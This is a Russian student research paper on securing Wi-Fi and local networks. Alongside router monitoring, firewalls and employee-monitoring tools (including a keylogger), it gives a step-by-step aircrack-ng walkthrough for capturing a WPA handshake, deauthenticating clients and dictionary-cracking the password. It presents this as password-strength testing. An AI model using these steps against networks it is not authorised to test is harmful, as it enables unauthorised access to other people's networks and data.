УДК 004

Методы тестирования ЛВС на защищённость от проникновения

Научный руководитель Забержинский Борислав Эдуардович – кандидат технических наук, доцент кафедры информационных технологий Самарского государственного технического университета.

Поляков Егор Александрович – студент Самарского государственного технического университета.

Аннотация: Информационная безопасность является неотъемлемой частью нашей повседневной жизни. Эта работа представляет собой подход к тестированию безопасности Wi-Fi сети, при помощи использования специализированной ОС Kali Linux, и устройства с встроенным ПО и Wi-Fi модулем, в данном исследовании применялся личный ноутбук исследователя. Результаты данного исследования могут быть полезны для повышения уровня защиты Wi-Fi сетей и обеспечения конфиденциальности данных пользователей. Дальнейшие шаги включают в себя тестирование предложенных мер безопасности и анализ их эффективности в защите Wi-Fi сетей от потенциальных кибератак.

Ключевые слова: информационная безопасность, безопасность сети, ЛВС, пароль, Wi-Fi, вредоносное ПО, кибератаки.

С каждым годом количество хакерских атак, DDoS атак и других воздействий на информационные системы растёт. Любая организация с построенной IT-инфраструктурой подвержены хакерским атакам: APT-атаки, вредоносные программы, вредоносное ПО, Dos или DDOS атаки, взломы, программы вымогатели, фишинг, спуфинг [1], что влияет на конфиденциальность персональных данных и коммерческой тайне. Кроме того, нельзя исключать варианты взлома частных и домашних wi-fi сетей. Каждому важна конфиденциальность и безопасность его личных данных. Есть множество способов защиты домашней wi-fi сети. Так как различных угроз безопасности информации с каждым годом все больше и больше, то необходимо найти методы защиты информации. В этой статье будет рассмотрено несколько возможных способов защиты для своевременного выявления хакерской атаки, защиты личных данных, нахождения нежелательного пользователя сети и мониторинга системы.

В статье рассматривается сетевая безопасность как важная вещь в работе любой компании. Вопрос безопасности данных будет актуален как для небольшого предприятия с небольшим документооборотом, так и для крупной корпорации. Есть множество технологий защиты, к сожалению, самый ненадежный способ защиты – человек, поэтому было создано множество автоматических систем защит: Антивирус, WAF, Брандмауэр Windows и т.д. Однако, нельзя исключать, что антивирус можно выключить, системы безопасности можно обойти, человек сможет работать с данными несмотря на антивирус или выключенную систему защиты. Грамотный специалист сможет вовремя прервать соединение при DDoS атаке, или увидеть перехват соединения и многое другое. Для организации это деньги, для человека – время на обучение.

Поэтому сегодня мы рассмотрим несколько способов как защитить данные в сети. Сначала рассмотрим способы защиты от внешних угроз, затем от возможных внутренних угроз на предприятии.

Внешние угрозы:

Способ 1:

Настроить постоянный мониторинг роутера, маршрутизатора или иного устройства, через которое пользуются интернетом.

Стандартный IP-адрес для большинства роутеров 192.168.0.1 или (192.168.1.1). Чтобы узнать состояние сети, количество активных пользователей в ней, необходимо зайти в браузер и ввести этот IP-адрес в адресную строку (Рис. 1).

Рисунок1

Рисунок 1. Мониторинг домашнего роутера

Производители обычно ставят утилиту для мониторинга подключённых клиентов, благодаря этому вы можете видеть:

  1. Количество подключённых устройств;
  2. Их IP-адрес в сети.

Этой информации уже достаточно чтобы предпринять какие-либо действия. Если вы заметили, что пользователей больше нужного количества, то необходимо сменить пароль или вернуть роутер до заводских настроек. Это самый простой и рабочий способ в домашних условиях, или на малом предприятии. Кроме того некоторые производители (например роутеры компании tp-link[2]) предоставляют возможность настроить получение уведомлений о подключении пользователей к сети. Данная функция позволит как можно быстрее выявить злоумышленника и предотвратить внешнее воздействие на систему.

Способ 2:

Выявление уязвимости при помощи Kali Linux.

Kali Linux — это дистрибутив операционной системы Linux. Это одна из немногих систем, которая предназначена для специалистов информационной безопасности. В неё входит ряд утилит, которые созданы для тестирования уязвимостей. Kali Linux редко используется как основная ОС, чаще всего она устанавливается как гостевая.[3]

Возможности Kali Linux действительно впечатляют с помощью консоли Kali Linux можно просканировать сеть и взломать её. Это делается следующими командами в терминале:

  1. airmon-ng

Эта команда выведет информацию о сетевых интерфейсах.

  1. airmon-ng start wlan0

Так как Kali Linux по умолчанию присваивает адаптеру беспроводной сети это имя: «wlan 0», то его и будем использовать. Данная команда переводит адаптер в режим мониторинга.

  1. airodump-ng wlan0mon

Данная команда запускает WI-FI адаптер в режиме мониторинга. Устройство начинает получать сигнал от всех видимых WI-FI сетей.

  1. airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]

В ней [channel] - номер целевого канала, [bssid] — целевой BSSID, [monitor interface] — интерфейс мониторинга wlan0mon.

5. airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0monКоманда выше приведена в качестве примера. Выполняя её мы ждём подключения к сети, как только это происходит, мы получаем «рукопожатие» и можем взломать сеть.6. aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0monЗдесь [router bssid] - BSSID Wi-Fi-сети, а [client bssid] — идентификатор рабочей станции.Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Команда №6 перехватывает сигнал на маршрутизаторе, выполняя внедрение пакетов. Цифра 0 обозначает выполнить деаутентификацию, а команда 2 – канал для подключения. В результате выполнения этой команды получим handshake-данные.7. aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.capГде a2 - означает WPA, b — это BSSID сети, w — это путь к списку паролей, .cap — это шаблон имён файлов, содержащих пароли.В итоге сеть взламывается.ИлиВыполняем следующие команды после 6 команды- aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon - wpaclean ИмяНовогоФайла ИмяСтарогоФайла - aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]Здесь мы используем словари для подбора пароля, это лучший способ для проверки пароля на качество, чем дольше подбирается пароль, тем лучше сеть защищена. Сеть может быть и вовсе не взломана, тогда это отличный показатель.Способ 3:Защита сети при помощи самостоятельно созданного брандмауэра. В данном способе есть 2 варианта развития событий:1. Установить бесплатный или платный брандмауэр.[4]2. Создать свой собственный брандмауэр. Более подробно процесс создания собственного брандмауэра описано на ресурсе[5]

Внутренние угрозы:

Под внутренними угрозами будем понимать использование доступа к глобальной сети интернет не по назначению. А именно поиск сайтов с играми, музыкой, видео и другим развлекательным контентом на рабочем месте.Способ 1:Покупка и настройка коммутатора доступа. Цена коммутатора может варьироваться от 2 899 рублей до 205 999 рублей. Настройка коммутатора обойдётся примерно в 3000 рублей.Это позволит на уровне сети ограничить доступ и контролировать трафик.Способ 2:С помощью регламентов.Самый простой, но не действенный способ. Подразумевает запрет доступа к развлекательным и иным сайтам в сети интернет при помощи юридического запрета.Люди часто обманывают, и уж тем более на работе. Однако, при этом, хорошая документация ИБ – залог качества информационной безопасности на предприятии. Обычно она имеет иерархическую структуру по следующему принципу (Рис. 2):

Рисунок2

Рисунок 2. Схема документации по информационной безопасности на предприятии.

Способ 3:ПрограммныйКонтролировать сеть можно и с помощью специального ПО. Например администратор сети, или директор предприятия устанавливает данное ПО и может видеть, чем занимается каждый сотрудник. В данной статье[6] приведены программы как раз для этого.Наилучшими вариантами являются:· Golden Keylogger;· StaffCop;· Zabbix;

Таблица 1. Сравнительная таблица специального ПО для отслеживания действий пользователей в сети.

Характеристика Golden Keylogger StaffCop Zabbix
Тип программы Отслеживание действий сотрудников Мониторинг активности сотрудников Мониторинг сети и серверов
Функциональность · Запись нажатий клавиш, скриншоты· Отслеживание нажатий клавиш · Отслеживание активности, блокировка приложений· Контроль действий сотрудников на компьютере · Мониторинг производительности и доступности сети· Мониторинг сетевых устройств, уведомления об ошибках
Платформа Windows Windows Кроссплатформенный
Лицензия Платная Платная Бесплатная и платная

 Как было показано в статье, существует множество угроз информационной безопасности. Но нам удалось достичь поставленных целей: найти способы бороться как с внутренними, так и с внешними уязвимостями. Используя приведя данные способы на предприятии и не только, можно свести к минимуму потерю информации, а также время расследований инцидентов, связанных с утечкой информации. Данная статья будет полезна для общего ознакомления сотрудникам отдела информационной безопасности или начинающим программистам. Нельзя исключать и появления новых угроз. Поэтому необходимо постоянно соблюдать все рекомендации для увеличения уровня информационной безопасности.

Список литературы

  1. «Кибертерроризм: виды атак, хакеров и их влияния на цели» SecurityLab.ru [Электронный ресурс]. URL: https://www.securitylab.ru/analytics/534885.php
  2. «Как установить Kali Linux на VirtualBox» help.reg.ru [Электронный ресурс]. URL: https://help.reg.ru/support/vydelennyye-servery-i-dc/vmware-virtualnyy-data-tsentr/sozdaniye-i-nastroyka-virtualnykh-mashin/kak-ustanovit-kali-linux-na-virtualbox
  1. «Взлом Wi-Fi-сетей, защищённых WPA и WPA2» Habr [Электронный ресурс]. URL: https://habr.com/ru/companies/ruvds/articles/534112/
  1. «8 лучших бесплатных брандмауэров для Windows» tunecom.ru [Электронный ресурс]. URL: https://tunecom.ru/security/1878-brandmaujery-dlja-windows.html
  2. «Build Your Own Firewall Step by Step» BrightHub [Электронный ресурс]. URL: https://www.brighthub.com/computing/smb-security/articles/46668/#extras--next-steps
  1. «ТОП-10 программ для контроля сетевых подключений» staffcop [Электронный ресурс]. URL: https://www.staffcop.ru/blog/top-10-programm-dlya-kontrolya-setevyh-podklyuchenij/